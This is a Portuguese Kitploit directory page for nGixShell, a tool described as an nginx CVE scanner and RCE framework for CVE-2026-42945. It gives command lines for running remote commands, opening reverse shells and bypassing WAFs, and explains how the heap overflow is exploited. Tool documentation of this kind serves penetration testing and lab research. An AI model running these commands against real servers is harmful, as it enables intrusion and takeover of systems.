Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
nGixshell — scanner de CVE nginx + framework de exploração RCE (CVE-2026-42945 + mais 16) | Kitploit
Ferramentas/GitHubGitHub/mateusverass/ngixshell
ReconhecimentoScanners de VulnerabilidadesFrameworks de ExploraçãoExploração de Aplicações WebBypass de WAFSegurança WebTestes de PenetraçãoComando e ControleEnumeração de SubdomíniosRed TeamingDesenvolvimento de Payloads
218há 3 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHub
mateusverass/ngixshell

nGixshell

scanner de CVE nginx + framework de exploração RCE (CVE-2026-42945 + mais 16)

Ver Repositório
Compartilhar
nGixShell

Python CVEs Zero deps License


nGixShell é um scanner de CVEs do nginx e um framework de exploração RCE. Ele inclui uma prova de conceito funcional para CVE-2026-42945 — um estouro de buffer crítico no heap em ngx_http_rewrite_module — e um scanner que abrange 53 CVEs do nginx com sondas HTTP automatizadas, fingerprinting, detecção/contorno de WAF, auditoria de segurança web e geração de relatórios.

Zero dependências externas. Apenas a stdlib do Python 3.


Início Rápido

root@kitploit:~
# Spin up the vulnerable lab
docker compose -f env/docker-compose.yml up -d

# Auto mode — fingerprint + CVE scan + web audit
python3 ngixshell.py 127.0.0.1:19321

# Execute a command via RCE (CVE-2026-42945)
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id'

# Drop a reverse shell (IP auto-detected)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# Detect and bypass WAF, then scan
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Subdomain scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Multiple targets from a file
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

Nenhuma flag necessária — apontar a ferramenta para um alvo executa tudo automaticamente.
TLS é detectado automaticamente. O nginx é identificado mesmo com server_tokens off.


Uso

root@kitploit:~
python3 ngixshell.py [TARGET] [OPÇÕES]

Formatos de TARGET:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

Modos

Detecção e Contorno de WAF

FlagDescrição
--waf-detectDetectar WAF antes de escanear
--waf-bypassAtivar todas as técnicas de contorno (também executa detecção)
--waf-ip IPFalsificar este IP nos cabeçalhos de contorno (padrão: RFC1918 aleatório)

Técnicas de contorno (todas ativas quando --waf-bypass está definido):

WAFs detectados: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence

Auditoria Web

Executada automaticamente no modo de scan. Todos os módulos podem ser ignorados individualmente.

  • Auditoria de cabeçalhos — HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy, cabeçalhos que vazam versão
  • Descoberta de caminhos — 50+ caminhos; sonda sentinela elimina falsos positivos de regras catch-all 403/301
  • Enumeração de virtual hosts — requer diferença de status E corpo para evitar falsos positivos de bloqueio padrão
  • Auditoria TLS — testa suporte TLS 1.0–1.3, expiração de certificado e detecção de autoassinados
  • stub_status — analisa métricas de conexão ativa de /nginx_status se exposto

Conexão

FlagDescrição
--port PORTASobrescrever porta
--tls

HTTP

FlagDescrição
--user-agent UAUser-Agent personalizado
--auth USUÁRIO:SENHAAutenticação básica HTTP

Taxa / Temporização

FlagDescrição
--rate-limit RPSMáximo de requisições por segundo
--jitter MS

Saída

FlagDescrição

Cobertura de CVE

53 entradas abrangendo 2009–2026. Ordenadas por CVSS.


O Bug (CVE-2026-42945)

O motor de script de rewrite do nginx usa um modelo de duas passagens: calcular o tamanho do buffer, depois copiar. A flag is_args é definida no motor principal quando uma substituição de rewrite contém ?, mas a passagem de cálculo de comprimento executa em um sub-motor recém-zerado:

  • Passagem de comprimento — vê is_args = 0 → retorna o comprimento bruto da captura
  • Passagem de cópia — vê is_args = 1 → chama ngx_escape_uri(NGX_ESCAPE_ARGS), expandindo cada byte inseguro para 3 bytes

A cópia estoura o buffer de heap subdimensionado com dados de URI controlados pelo atacante. A exploração corrompe um ponteiro de limpeza ngx_pool_t adjacente via heap feng shui entre requisições, redirecionando-o para um ngx_pool_cleanup_s falso que chama system() na destruição do pool.

Versões Afetadas

ProdutoVulnerávelCorrigido
NGINX Open Source0.6.27 – 1.30.01.31.0, 1.30.1
NGINX PlusR32 – R36R36 P4, R35 P2, R32 P6

Advisory do fornecedor: https://my.f5.com/manage/s/article/K000160932


Configuração do Laboratório

Testado no Ubuntu 24.04 LTS. Requer Docker e Python 3.8+.

root@kitploit:~
# Iniciar o laboratório vulnerável (nginx 1.25.3)
docker compose -f env/docker-compose.yml up -d

# Varredura completa
python3 ngixshell.py 127.0.0.1:19321

# RCE com saída JSON
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id' --json

# Reverse shell — payload bash, upgrade automático de PTY
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# Varredura com contorno de WAF e IP falsificado
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass --waf-ip 10.10.10.1

# Através de proxy SOCKS5
python3 ngixshell.py 192.168.1.10 --proxy socks5://127.0.0.1:9050

# Varredura de subdomínios com limitação de taxa
python3 ngixshell.py --subdomain-scan example.com --scan-port 443 --rate-limit 10

# Múltiplos alvos, saída JSON, relatório HTML
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

Aviso

Apenas para testes autorizados de segurança, competições CTF e pesquisa.

Baixar ferramenta
FlagDescrição
(nenhuma)Auto — fingerprint + scan CVE + auditoria web
--cmd 'COMANDO'Executar comando via CVE-2026-42945 RCE
--cmd-file ARQUIVOExecutar comandos de um arquivo (unidos com ;)
--shellObter uma reverse shell
--shell-type TIPOPayload: bash python perl php nc powershell (padrão: python)
--upgrade-shellEnviar upgrade de PTY automaticamente após a shell conectar
--subdomain-scan DOMÍNIOEncontrar nginx vulnerável em subdomínios
--cve ID-CVETestar uma CVE específica
--list-cvesExibir todas as 53 CVEs com CVSS e informações de sonda
--list-candidatesExibir candidatos de endereço de heap
--dry-runApenas fingerprint + scan, sem exploração
--target-file ARQUIVOEscanear múltiplos hosts a partir de um arquivo
TécnicaDetalhe
Falsificação de IPX-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
Rotação de UA11 User-Agents reais de navegadores/bots, aleatorizados por requisição
Ofuscação de caminhobarra dupla, padding com /./, codificação percentual, variação de maiúsculas/minúsculas
Embaralhamento de case de cabeçalhoaleatoriza a capitalização dos nomes de cabeçalho para quebrar a correspondência de padrões do WAF
FlagDescrição
--skip-headersPular auditoria de cabeçalhos de segurança HTTP
--skip-pathsPular descoberta de caminhos/arquivos
--skip-vhostsPular enumeração de virtual hosts
--skip-tlsPular auditoria de protocolo TLS
--path-wordlist ARQUIVOCaminhos extras para sondar (um por linha)
Forçar TLS (detectado automaticamente por padrão)
--proxy URLProxy: http://, https://, socks5://
--cookie VALOR
Cabeçalho Cookie
--header NOME:VALORCabeçalho extra (repetível)
Atraso aleatório de 0–MS ms entre requisições
--retry NRepetir sondas inconclusivas (padrão: 1)
--timeout-multiplier XEscalar todos os timeouts (padrão: 1.0)
--output ARQUIVO
Escrever log no ARQUIVO
--jsonExibir resumo em JSON ao final
--html-report [ARQUIVO]Gerar relatório HTML (padrão: ngixshell_<host>_<ts>.html)
--verboseSaída de depuração
CVECVSSComponenteDescrição
CVE-2026-429459.8 CRÍTICOrewriteEstouro de heap → RCE (explorado)
CVE-2026-429468.1 ALTOrewriteCorrupção de memória (mesmo advisory)
CVE-2022-417417.8 ALTOmp4Corrupção de memória via mp4 malicioso
CVE-2016-12477.8 ALTOpackagingEscalação de privilégio via link simbólico em arquivo de log
CVE-2021-230177.7 ALTOresolverSobrescrita de heap off-by-one
CVE-2026-407017.5 ALTOrequestCorrupção de memória no processamento de requisições
CVE-2026-429347.5 ALTOrequestCorrupção de memória (mesmo advisory)
CVE-2026-277847.5 ALTOmp4Estouro de buffer via mp4 manipulado
CVE-2026-326477.5 ALTOmp4Estouro de buffer (irmão do acima)
CVE-2024-249907.5 ALTOHTTP/3Use-after-free no módulo QUIC
CVE-2024-249897.5 ALTOHTTP/3Desreferência de ponteiro nulo no QUIC
CVE-2024-310797.5 ALTOHTTP/3Estouro de pilha no codificador QUIC
CVE-2024-327607.5 ALTOHTTP/3Sobrescrita de buffer via frame HEADERS
CVE-2022-417427.5 ALTOmp4Divulgação de memória heap
CVE-2017-75297.5 ALTOrange filterEstouro de inteiro → leitura fora dos limites
CVE-2016-07467.5 ALTOresolverUse-after-free via resposta DNS manipulada
CVE-2014-01337.5 ALTOSPDYEstouro de heap na implementação SPDY
CVE-2014-00887.5 ALTOSPDYCorrupção de memória no SPDY
CVE-2013-45477.5 ALTOcoreBypass de URI com Space+NUL
CVE-2013-20287.5 ALTOcoreEstouro de pilha em codificação chunked
CVE-2012-11807.5 ALTOproxyUse-after-free no módulo proxy
CVE-2009-35557.5 ALTOSSLInjeção de renegociação TLS (MITM)
CVE-2009-26297.5 ALTOcoreUnderflow de buffer no parsing de URI
CVE-2026-429266.5 MÉDIOHTTP/2Divisão de requisição via proxy
CVE-2026-276546.5 MÉDIOWebDAVEstouro de heap no módulo DAV
CVE-2026-287536.5 MÉDIOmailInjeção de cabeçalho no proxy de email
CVE-2026-16426.5 MÉDIOproxyVazamento de reutilização de sessão SSL upstream
CVE-2019-95116.5 MÉDIOHTTP/2Data Dribble DoS de CPU/memória
CVE-2012-20896.8 MÉDIOmp4Estouro de buffer via requisição mp4
CVE-2018-168455.5 MÉDIOmp4Underflow de inteiro → crash + divulgação
CVE-2019-203725.3 MÉDIOproxyContrabando de requisição HTTP
CVE-2026-404605.3 MÉDIOHTTP/3Falsificação de conexão QUIC
CVE-2026-287555.3 MÉDIOSSLDivulgação de memória no processamento OCSP
CVE-2025-234195.3 MÉDIOSSLBypass de certificado na retomada de sessão TLS
CVE-2024-352005.3 MÉDIOHTTP/3Desreferência de ponteiro nulo
CVE-2024-341615.3 MÉDIOHTTP/3Divulgação de memória
CVE-2016-44505.3 MÉDIOcorePonteiro nulo via corpo de requisição chunked
CVE-2016-07425.0 MÉDIOresolverPonteiro inválido via pacote UDP manipulado
CVE-2016-07475.0 MÉDIOresolverLimite insuficiente de resolução CNAME
CVE-2014-35565.0 MÉDIOmailInjeção de comando STARTTLS
CVE-2013-20705.3 MÉDIOproxyDivulgação de resposta do backend
CVE-2011-49635.0 MÉDIOaccessBypass de controle de acesso via literal IPv6
CVE-2011-43155.0 MÉDIOresolverEstouro de heap via resposta DNS manipulada
CVE-2009-38965.0 MÉDIOcoreDoS por desreferência de ponteiro nulo
CVE-2025-538594.3 MÉDIOmailInjeção de comando SMTP
CVE-2014-36164.3 MÉDIOSSLConfusão de host virtual via SNI TLS
CVE-2026-276514.3 MÉDIOmailDesreferência de ponteiro nulo no proxy de email
CVE-2019-95134.3 MÉDIOHTTP/2Resource Loop DoS de CPU
CVE-2019-95164.3 MÉDIOHTTP/2Exaustão de memória via cabeçalhos de tamanho 0
CVE-2018-168434.3 MÉDIOHTTP/2Consumo excessivo de memória
CVE-2018-168444.3 MÉDIOHTTP/2CPU excessivo via frames SETTINGS
CVE-2024-73474.7 MÉDIOmp4Leitura fora dos limites
CVE-2009-38984.9 MÉDIOWebDAVTravessia de diretório via COPY/MOVE